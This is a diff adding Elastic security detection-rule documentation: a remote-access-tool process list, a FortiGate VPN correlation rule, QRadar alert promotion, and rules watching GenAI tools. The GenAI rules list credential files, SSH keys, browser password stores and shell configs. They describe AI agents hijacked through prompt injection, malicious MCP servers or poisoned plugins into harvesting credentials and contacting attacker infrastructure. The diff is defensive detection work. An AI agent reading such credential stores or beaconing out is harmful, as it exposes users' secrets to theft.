"SAFIB" or + "Servably, Inc." or + "ShowMyPC INC" or + "Splashtop Inc." or + "Superops Inc." or + "TeamViewer" or + "TeamViewer GmbH" or + "TeamViewer Germany GmbH" or + "Techinline Limited" or + "uvnc bvba" or + "Yakhnovets Denis Aleksandrovich IP" or + "Zhou Huabing" or + "ZOHO Corporation Private Limited" or + "Connectwise, LLC" or + "ScreenConnect Client" or + "Servably Inc." + ) or + + process.name.caseless : ( + AA_v*.exe or + "AeroAdmin.exe" or + "AnyDesk.exe" or + "apc_Admin.exe" or + "apc_host.exe" or + "AteraAgent.exe" or + aweray_remote*.exe or + "AweSun.exe" or + "AgentMon.exe" or + "B4-Service.exe" or + "BASupSrvc.exe" or + "bomgar-scc.exe" or + "domotzagent.exe" or + "domotz-windows-x64-10.exe" or + "dwagsvc.exe" or + "DWRCC.exe" or + "ImperoClientSVC.exe" or + "ImperoServerSVC.exe" or + "ISLLight.exe" or + "ISLLightClient.exe" or + fleetdeck_commander*.exe or + "getscreen.exe" or + "g2aservice.exe" or + "GoToAssistService.exe" or + "gotohttp.exe" or + "jumpcloud-agent.exe" or + "level.exe" or + "LvAgent.exe" or + "LMIIgnition.exe" or + "LogMeIn.exe" or + "ManageEngine_Remote_Access_Plus.exe" or + "MeshAgent.exe" or + "Mikogo-Service.exe" or + "NinjaRMMAgent.exe" or + "NinjaRMMAgenPatcher.exe" or + "ninjarmm-cli.exe" or + "parsec.exe" or + "PService.exe" or + "quickassist.exe" or + "r_server.exe" or + "radmin.exe" or + "radmin3.exe" or + "RCClient.exe" or + "RCService.exe" or + "RemoteDesktopManager.exe" or + "RemotePC.exe" or + "RemotePCDesktop.exe" or + "RemotePCService.exe" or + "rfusclient.exe" or + "ROMServer.exe" or + "ROMViewer.exe" or + "RPCSuite.exe" or + "rserver3.exe" or + "rustdesk.exe" or + "rutserv.exe" or + "rutview.exe" or + "saazapsc.exe" or + ScreenConnect*.exe or + "session_win.exe" or + "Remote Support.exe" or + "smpcview.exe" or + "spclink.exe" or + "Splashtop-streamer.exe" or + "Syncro.Overmind.Service.exe" or + "SyncroLive.Agent.Runner.exe" or + "SRService.exe" or + "strwinclt.exe" or + "Supremo.exe" or + "SupremoService.exe" or + "tacticalrmm.exe" or + "tailscale.exe" or + "tailscaled.exe" or + "teamviewer.exe" or + "ToDesk_Service.exe" or + "twingate.exe" or + "TiClientCore.exe" or + "TSClient.exe" or + "tvn.exe" or + "tvnserver.exe" or + "tvnviewer.exe" or + UltraVNC*.exe or + UltraViewer*.exe or + "vncserver.exe" or + "vncviewer.exe" or + "winvnc.exe" or + "winwvc.exe" or + "Zaservice.exe" or + "ZohoURS.exe" or + "Velociraptor.exe" or + "ToolsIQ.exe" or + "CagService.exe" or + "ScreenConnect.ClientService.exe" or + "TiAgent.exe" or + "GoToResolveProcessChecker.exe" or + "GoToResolveUnattended.exe" or + "Syncro.Installer.exe" + ) or + process.name : ( + AA_v*.exe or + "AeroAdmin.exe" or + "AnyDesk.exe" or + "apc_Admin.exe" or + "apc_host.exe" or + "AteraAgent.exe" or + aweray_remote*.exe or + "AweSun.exe" or + "AgentMon.exe" or + "B4-Service.exe" or + "BASupSrvc.exe" or + "bomgar-scc.exe" or + "CagService.exe" or + "domotzagent.exe" or + "domotz-windows-x64-10.exe" or + "dwagsvc.exe" or + "DWRCC.exe" or + "ImperoClientSVC.exe" or + "ImperoServerSVC.exe" or + "ISLLight.exe" or + "ISLLightClient.exe" or + fleetdeck_commander*.exe or + "getscreen.exe" or + "g2aservice.exe" or + "GoToAssistService.exe" or + "gotohttp.exe" or + "jumpcloud-agent.exe" or + "level.exe" or + "LvAgent.exe" or + "LMIIgnition.exe" or + "LogMeIn.exe" or + "ManageEngine_Remote_Access_Plus.exe" or + "MeshAgent.exe" or + "meshagent.exe" or + "Mikogo-Service.exe" or + "NinjaRMMAgent.exe" or + "NinjaRMMAgenPatcher.exe" or + "ninjarmm-cli.exe" or + "parsec.exe" or + "PService.exe" or + "quickassist.exe" or + "r_server.exe" or + "radmin.exe" or + "radmin3.exe" or + "RCClient.exe" or + "RCService.exe" or + "RemoteDesktopManager.exe" or + "RemotePC.exe" or + "RemotePCDesktop.exe" or + "RemotePCService.exe" or + "rfusclient.exe" or + "ROMServer.exe" or + "ROMViewer.exe" or + "RPCSuite.exe" or + "rserver3.exe" or + "rustdesk.exe" or + "rutserv.exe" or + "rutview.exe" or + "saazapsc.exe" or + ScreenConnect*.exe or + "session_win.exe" or + "Remote Support.exe" or + "smpcview.exe" or + "spclink.exe" or + "Splashtop-streamer.exe" or + "Syncro.Overmind.Service.exe" or + "SyncroLive.Agent.Runner.exe" or + "SRService.exe" or + "strwinclt.exe" or + "Supremo.exe" or + "SupremoService.exe" or + "tacticalrmm.exe" or + "tailscale.exe" or + "tailscaled.exe" or + "teamviewer.exe" or + "TiClientCore.exe" or + "ToDesk_Service.exe" or + "twingate.exe" or + "TSClient.exe" or + "tvn.exe" or + "tvnserver.exe" or + "tvnviewer.exe" or + UltraVNC*.exe or + UltraViewer*.exe or + "vncserver.exe" or + "vncviewer.exe" or + "winvnc.exe" or + "winwvc.exe" or + "Zaservice.exe" or + "ZohoURS.exe" or + "Velociraptor.exe" or + "ToolsIQ.exe" or + "ScreenConnect.ClientService.exe" or + "TiAgent.exe" or + "GoToResolveProcessChecker.exe" or + "GoToResolveUnattended.exe" or + "Syncro.Installer.exe" + ) or + process.parent.code_signature.subject_name : ( + "Action1 Corporation" or + "AeroAdmin LLC" or + "Ammyy LLC" or + "Atera Networks Ltd" or + "AWERAY PTE. LTD." or + "BeamYourScreen GmbH" or + "Bomgar Corporation" or + "DUC FABULOUS CO.,LTD" or + "DOMOTZ INC." or + "DWSNET OÜ" or + "FleetDeck Inc" or + "GlavSoft LLC" or + "GlavSoft LLC." or + "Hefei Pingbo Network Technology Co. Ltd" or + "IDrive, Inc." or + "IMPERO SOLUTIONS LIMITED" or + "Instant Housecall" or + "ISL Online Ltd." or + "LogMeIn, Inc." or + "Monitoring Client" or + "MMSOFT Design Ltd." or + "Nanosystems S.r.l." or + "NetSupport Ltd" or + "NetSupport Ltd." or + "NETSUPPORT LTD." or + "NinjaRMM, LLC" or + "Parallels International GmbH" or + "philandro Software GmbH" or + "Pro Softnet Corporation" or + "RealVNC" or + "RealVNC Limited" or + "BreakingSecurity.net" or + "Remote Utilities LLC" or + "Rocket Software, Inc." or + "SAFIB" or + "Servably, Inc." or + "ShowMyPC INC" or + "Splashtop Inc." or + "Superops Inc." or + "TeamViewer" or + "TeamViewer GmbH" or + "TeamViewer Germany GmbH" or + "Techinline Limited" or + "uvnc bvba" or + "Yakhnovets Denis Aleksandrovich IP" or + "Zhou Huabing" or + "ZOHO Corporation Private Limited" or + "Connectwise, LLC" or + "ScreenConnect Client" or + "Servably Inc." + ) or + process.parent.name: ( + AA_v*.exe or + "AeroAdmin.exe" or + "AnyDesk.exe" or + "apc_Admin.exe" or + "apc_host.exe" or + "AteraAgent.exe" or + aweray_remote*.exe or + "AweSun.exe" or + "AgentMon.exe" or + "B4-Service.exe" or + "BASupSrvc.exe" or + "bomgar-scc.exe" or + "domotzagent.exe" or + "domotz-windows-x64-10.exe" or + "dwagsvc.exe" or + "DWRCC.exe" or + "ImperoClientSVC.exe" or + "ImperoServerSVC.exe" or + "ISLLight.exe" or + "ISLLightClient.exe" or + fleetdeck_commander*.exe or + "getscreen.exe" or + "g2aservice.exe" or + "GoToAssistService.exe" or + "gotohttp.exe" or + "jumpcloud-agent.exe" or + "level.exe" or + "LvAgent.exe" or + "LMIIgnition.exe" or + "LogMeIn.exe" or + "ManageEngine_Remote_Access_Plus.exe" or + "MeshAgent.exe" or + "Mikogo-Service.exe" or + "NinjaRMMAgent.exe" or + "NinjaRMMAgenPatcher.exe" or + "ninjarmm-cli.exe" or + "parsec.exe" or + "PService.exe" or + "quickassist.exe" or + "r_server.exe" or + "radmin.exe" or + "radmin3.exe" or + "RCClient.exe" or + "RCService.exe" or + "RemoteDesktopManager.exe" or + "RemotePC.exe" or + "RemotePCDesktop.exe" or + "RemotePCService.exe" or + "rfusclient.exe" or + "ROMServer.exe" or + "ROMViewer.exe" or + "RPCSuite.exe" or + "rserver3.exe" or + "rustdesk.exe" or + "rutserv.exe" or + "rutview.exe" or + "saazapsc.exe" or + ScreenConnect*.exe or + "session_win.exe" or + "Remote Support.exe" or + "smpcview.exe" or + "spclink.exe" or + "Splashtop-streamer.exe" or + "Syncro.Overmind.Service.exe" or + "SyncroLive.Agent.Runner.exe" or + "SRService.exe" or + "strwinclt.exe" or + "Supremo.exe" or + "SupremoService.exe" or + "tacticalrmm.exe" or + "tailscale.exe" or + "tailscaled.exe" or + "teamviewer.exe" or + "ToDesk_Service.exe" or + "twingate.exe" or + "TiClientCore.exe" or + "TSClient.exe" or + "tvn.exe" or + "tvnserver.exe" or + "tvnviewer.exe" or + UltraVNC*.exe or + UltraViewer*.exe or + "vncserver.exe" or + "vncviewer.exe" or + "winvnc.exe" or + "winwvc.exe" or + "Zaservice.exe" or + "ZohoURS.exe" or + "Velociraptor.exe" or + "ToolsIQ.exe" or + "CagService.exe" or + "TiAgent.exe" or + "GoToResolveProcessChecker.exe" or + "GoToResolveUnattended.exe" + ) + ) and + not (process.pe.original_file_name : ("G2M.exe" or "Updater.exe" or "powershell.exe") and process.code_signature.subject_name : "LogMeIn, Inc.") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc new file mode 100644 index 0000000000..9e3b69af33 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc @@ -0,0 +1,105 @@ +[[prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user]] +=== FortiGate SSL VPN Login Followed by SIEM Alert by User + +Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. + +*Rule type*: eql + +*Rule indices*: + +* logs-fortinet_fortigate.log-* +* .alerts-security.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/tactics/TA0001/ +* https://www.elastic.co/docs/reference/integrations/fortinet_fortigate + +*Tags*: + +* Use Case: Threat Detection +* Rule Type: Higher-Order Rule +* Tactic: Initial Access +* Data Source: Fortinet +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating FortiGate SSL VPN Login Followed by SIEM Alert by User* + + +This rule correlates a FortiGate SSL VPN login with a subsequent security alert for the same user name, highlighting possible abuse of VPN access or activity shortly after remote access. + + +*Possible investigation steps* + + +- Review the FortiGate login event (source IP, user, time) and the SIEM alert(s) that followed for the same user. +- Determine whether the user is expected to use VPN and whether the subsequent alert is related to legitimate work (e.g. admin tools, updates). +- Check for other alerts or logins for the same user in the same time window to assess scope. +- Correlate with authentication logs to identify impossible travel or credential reuse from the VPN session. + + +*False positive analysis* + + +- Legitimate VPN users triggering detections (e.g. scripted tasks, admin tooling) after login. +- Security scans or automated jobs that run in the context of a VPN-authenticated user. + + +*Response and remediation* + + +- If abuse or compromise is suspected, disable or reset the user’s VPN access and credentials. +- Investigate the host and process associated with the SIEM alert. +- Escalate to the security or incident response team if the alert indicates malicious activity. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by user.name with maxspan=10m + [authentication where event.dataset == "fortinet_fortigate.log" and event.action == "login" and event.code in ("0101039426", "0101039427") and + user.name != "root"] + [any where event.kind == "signal" and kibana.alert.rule.name != null and event.dataset != "fortinet_fortigate.log" and + kibana.alert.risk_score > 21 and kibana.alert.rule.rule_id != "a7f2c1b4-5d8e-4f3a-9b0c-2e1d4a6b8f3e" and user.name != null] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc new file mode 100644 index 0000000000..cf03eaa44d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc @@ -0,0 +1,182 @@ +[[prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files]] +=== GenAI Process Accessing Sensitive Files + +Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://atlas.mitre.org/techniques/AML.T0085 +* https://atlas.mitre.org/techniques/AML.T0085.001 +* https://atlas.mitre.org/techniques/AML.T0055 +* https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks +* https://www.elastic.co/security-labs/elastic-advances-llm-security +* https://specterops.io/blog/2025/11/21/an-evening-with-claude-code + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM +* Mitre Atlas: T0085 +* Mitre Atlas: T0085.001 +* Mitre Atlas: T0055 + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating GenAI Process Accessing Sensitive Files* + + +This rule detects GenAI tools accessing credential files, SSH keys, browser data, or shell configurations. While GenAI tools legitimately access project files, access to sensitive credential stores is unusual and warrants investigation. + + +*Possible investigation steps* + + +- Review the GenAI process that triggered the alert to identify which tool is being used and verify if it's an expected/authorized tool. +- Investigate the user account associated with the GenAI process to determine if this activity is expected for that user. +- Review the types of sensitive files being accessed (credentials, keys, browser data, etc.) to assess the potential impact of credential harvesting or data exfiltration. +- Check for other alerts or suspicious activity on the same host around the same time, particularly network exfiltration events. +- Verify if the GenAI tool or extension is from a trusted source and if it's authorized for use in your environment. +- Determine if the GenAI process accessed multiple sensitive directories in sequence, an indication of credential harvesting. +- Check if the GenAI tool recently created or accessed AI agent config files, which may contain instructions enabling autonomous file scanning. +- Review whether the access was preceded by an MCP server, LangChain agent, or background automation. + + +*False positive analysis* + + +- Automated security scanning or auditing tools that leverage GenAI may access sensitive files as part of their normal operation. +- Development workflows that use GenAI tools for code analysis may occasionally access credential files. + + +*Response and remediation* + + +- Immediately review the GenAI process that accessed the documents to determine if it's compromised or malicious. +- Review, rotate, and revoke any API keys, tokens, or credentials that may have been exposed or used by the GenAI tool. +- Investigate the document access patterns to determine the scope of potential data exfiltration. +- Update security policies to restrict or monitor GenAI tool usage in the environment, especially for access to sensitive files. + + +==== Rule query + + +[source, js] +---------------------------------- +file where event.action in ("open", "creation", "modification") and event.outcome == "success" and + + // GenAI process + ( + process.name in ( + "ollama.exe", "ollama", "Ollama", + "textgen.exe", "textgen", "text-generation-webui.exe", "oobabooga.exe", + "lmstudio.exe", "lmstudio", "LM Studio", + "claude.exe", "claude", "Claude", + "cursor.exe", "cursor", "Cursor", + "copilot.exe", "copilot", "Copilot", + "codex.exe", "codex", + "Jan", "jan.exe", "jan", + "gpt4all.exe", "gpt4all", "GPT4All", + "gemini-cli.exe", "gemini-cli", + "genaiscript.exe", "genaiscript", + "grok.exe", "grok", + "qwen.exe", "qwen", + "koboldcpp.exe", "koboldcpp", "KoboldCpp", + "llama-server", "llama-cli" + ) or + // OpenClaw/Moltbot/Clawdbot via Node.js + (process.name in ("node", "node.exe") and + process.command_line like~ ("*openclaw*", "*moltbot*", "*clawdbot*")) + ) and + + // Sensitive file paths + ( + // Persistence via Shell configs + file.name in (".bashrc", ".bash_profile", ".zshrc", ".zshenv", ".zprofile", ".profile", ".bash_logout") or + + // Credentials In Files + file.name like~ + ("key?.db", + "logins.json", + "Login Data", + "Local State", + "signons.sqlite", + "Cookies", + "cookies.sqlite", + "Cookies.binarycookies", + "login.keychain-db", + "System.keychain", + "credentials.db", + "credentials", + "access_tokens.db", + "accessTokens.json", + "azureProfile.json", + "RDCMan.settings", + "known_hosts", + "KeePass.config.xml", + "Unattended.xml") + ) and not ( + host.os.type == "windows" and + process.name : ("claude.exe", "Claude") and + file.path : ("?:\\Users\\*\\AppData\\Roaming\\Claude\\Local State", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\Local State") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc new file mode 100644 index 0000000000..d252c547b3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain]] +=== GenAI Process Connection to Unusual Domain + +Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.network* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://atlas.mitre.org/techniques/AML.T0086 +* https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks +* https://www.elastic.co/security-labs/elastic-advances-llm-security +* https://specterops.io/blog/2025/11/21/an-evening-with-claude-code + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM +* Mitre Atlas: T0086 + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating GenAI Process Connection to Unusual Domain* + + +GenAI tools with network access can be weaponized to contact attacker infrastructure for C2, data exfiltration, or payload retrieval. Compromised MCP servers, malicious plugins, or prompt injection attacks can redirect AI agents to connect to arbitrary domains. While legitimate GenAI tools connect to vendor APIs and CDNs, connections to unusual domains may indicate exploitation. + + +*Possible investigation steps* + + +- Review the destination domain to determine if it's a legitimate GenAI service, CDN, package registry, or potentially malicious infrastructure. +- Investigate the GenAI process command line and configuration to identify what triggered the connection (plugin, MCP server, user prompt). +- Check if the domain was recently registered, uses a suspicious TLD, or has a low reputation score in threat intelligence feeds. +- Review the timing and context of the connection to determine if it correlates with user activity or was automated. +- Examine network traffic to and from the domain to identify the nature of the communication (API calls, file downloads, data exfiltration). +- Check for other hosts in the environment connecting to the same domain to determine if this is an isolated incident. +- Investigate whether the GenAI tool's configuration files were recently modified to add new MCP servers or plugins. +- Correlate with file events to see if the GenAI tool downloaded or created files around the same time as the connection. + + +*False positive analysis* + + +- GenAI tools may connect to new domains as vendors update their infrastructure, CDNs, or API endpoints. +- Package managers (npm, pip) used by MCP servers may connect to package registries for dependency resolution. +- Legitimate MCP servers and AI plugins connect to their respective backend services. +- Developer workflows testing new AI integrations or MCP servers will naturally trigger alerts for novel domain connections. + + +*Response and remediation* + + +- If the domain is confirmed malicious, block it at the network level and investigate the source of the compromise. +- Review the GenAI tool's configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection. +- Investigate any data that may have been sent to the suspicious domain and assess the potential for data exfiltration. +- Review and rotate any API keys, tokens, or credentials used by the GenAI tool. +- Update detection rules to monitor the identified domain across all hosts in the environment. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:network and host.os.type:macos and event.action:connection_attempted and +( + process.name:( + Claude or "Claude Helper" or "Claude Helper (Plugin)" or Copilot or Cursor or + "Cursor Helper" or "Cursor Helper (Plugin)" or GPT4All or Jan or "Jan Helper" or + KoboldCpp or "LM Studio" or Ollama or Windsurf or "Windsurf Helper" or + "Windsurf Helper (Plugin)" or bunx or claude or codex or copilot or cursor or deno or + gemini-cli or genaiscript or gpt4all or grok or jan or koboldcpp or llama-cli or + llama-server or lmstudio or npx or ollama or pnpm or qwen or textgen or windsurf or yarn + ) or + (process.name:(node or node.exe) and process.command_line:(*openclaw* or *moltbot* or *clawdbot*)) +) and destination.domain:(* and not ( + aka.ms or anthropic.com or atlassian.com or cursor.com or cursor.sh or github.com or + gpt4all.io or hf.co or huggingface.co or lmstudio.ai or localhost or ollama.ai or + ollama.com or openai.com or *.aka.ms or *.akamaized.net or *.amazonaws.com or + *.amplitude.com or *.anthropic.com or *.atlassian.com or *.aws.amazon.com or + *.azure.com or *.cdn.cloudflare.net or *.cloudflare-dns.com or *.cloudflare.com or + *.cloudflarestorage.com or *.codeium.com or *.cursor.com or *.cursor.sh or + *.datadoghq.com or *.elastic-cloud.com or *.elastic.co or *.exp-tas.com or + *.gemini.google.com or *.generativelanguage.googleapis.com or *.github.com or + *.githubcopilot.com or *.githubusercontent.com or *.gitkraken.com or *.gitkraken.dev or + *.google.com or *.googleapis.com or *.gpt4all.io or *.grok.x.ai or *.hf.co or + *.honeycomb.io or *.huggingface.co or *.intercom.io or *.jan.ai or *.launchdarkly.com or + *.lmstudio.ai or *.microsoft.com or *.mixpanel.com or *.msedge.net or *.npmjs.com or + *.npmjs.org or *.ollama.ai or *.ollama.com or *.openai.com or *.pypi.org or + *.r2.cloudflarestorage.com or *.segment.io or *.sentry.io or *.visualstudio.com or + *.vsassets.io or *.vscode-cdn.net or *.windsurf.ai or *.x.ai or *.yarnpkg.com or + *.cartocdn.com or *.chatgpt.com or *.claude.ai or *.claude.com or + *.claudeusercontent.com or *.ggpht.com or *.gstatic.com or *.googleusercontent.com or + *.launchpadcontent.net or *.pythonhosted.org or *.recaptcha.net or *.shields.io or + *.snapcraftcontent.com or *.snapcraft.io or *.stripe.com or *.travis-ci.com or + *.travis-ci.org or *.ubuntu.com or *.ytimg.com or + *.github.io or *.githubassets.com or *.jsdelivr.net or *.nodesource.com or + chatgpt.com or claude.ai or claude.com or flagcdn.com or gitlab.com or + opencollective.com or pypi.org +)) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc new file mode 100644 index 0000000000..5be1620cbe --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-18-ibm-qradar-external-alerts]] +=== IBM QRadar External Alerts + +Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app. + +*Rule type*: query + +*Rule indices*: + +* logs-ibm_qradar.offense-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 1m + +*Searches indices from*: now-2m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 1000 + +*References*: + +* https://docs.elastic.co/en/integrations/ibm_qradar + +*Tags*: + +* Data Source: IBM QRadar +* Use Case: Threat Detection +* Resources: Investigation Guide +* Promotion: External Alerts + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating IBM QRadar External Alerts* + + +IBM QRadar is a Security Intelligence Platform that provides SIEM, log management, anomaly detection, and incident forensics. The rule promotes QRadar offense records as Elastic detection alerts, enabling analysts to investigate potential threats with full offense context including rule names, severity, and status. + + +*Possible investigation steps* + + +- Review the offense details including rule name, description, and categories to understand the nature of the alert. +- Examine the offense severity and status (OPEN, HIDDEN, etc.) to prioritize investigation. +- Cross-reference the offense with QRadar console for additional context including contributing events and log sources. +- Investigate source and destination networks, device count, and event count associated with the offense. +- Consult the IBM QRadar investigation guide and resources tagged in the alert for specific guidance on handling similar threats. + + +*False positive analysis* + + +- Offenses triggered by routine administrative activities or known maintenance can be false positives. Review the offense context and create exceptions for scheduled activities. +- Legitimate security testing or penetration testing may generate offenses. Coordinate with security teams to whitelist these during scheduled tests. +- Low-severity offenses from specific rules that are known to produce noise can be excluded by creating rule exceptions. +- Offenses from development or test environments may not require investigation. Consider excluding these environments if appropriate. + + +*Response and remediation* + + +- Isolate affected systems if malicious activity is confirmed to prevent lateral movement. +- Review the offense details to identify compromised accounts, credentials, or systems and take appropriate remediation steps. +- Apply relevant security patches or updates to address any exploited vulnerabilities. +- Escalate to the security operations center (SOC) or incident response team for further analysis if the threat appears significant. +- Document the incident and update detection logic or exceptions based on findings. + + +==== Setup + + + +*Setup* + + + +*IBM QRadar Offense Integration* + +This rule is designed to capture offense events generated by the IBM QRadar integration and promote them as Elastic detection alerts. + +To capture IBM QRadar offenses, install and configure the IBM QRadar integration to ingest offense records into the `logs-ibm_qradar.offense-*` index pattern. + +If this rule is enabled alongside the External Alerts promotion rule (UUID: eb079c62-4481-4d6e-9643-3ca499df7aaa), you may receive duplicate alerts for the same QRadar events. Consider adding a rule exception for the External Alert rule to exclude data_stream.dataset:ibm_qradar.offense to avoid receiving duplicate alerts. + + +*Additional notes* + + +For information on troubleshooting the maximum alerts warning please refer to this https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts[guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.kind: alert and data_stream.dataset: ibm_qradar.offense + +---------------------------------- diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc new file mode 100644 index 0000000000..9bcb0804ed --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc @@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits]] +=== Ingress Transfer via Windows BITS + +Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1197/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 12 + +*Rule authors*: + +* Elastic + 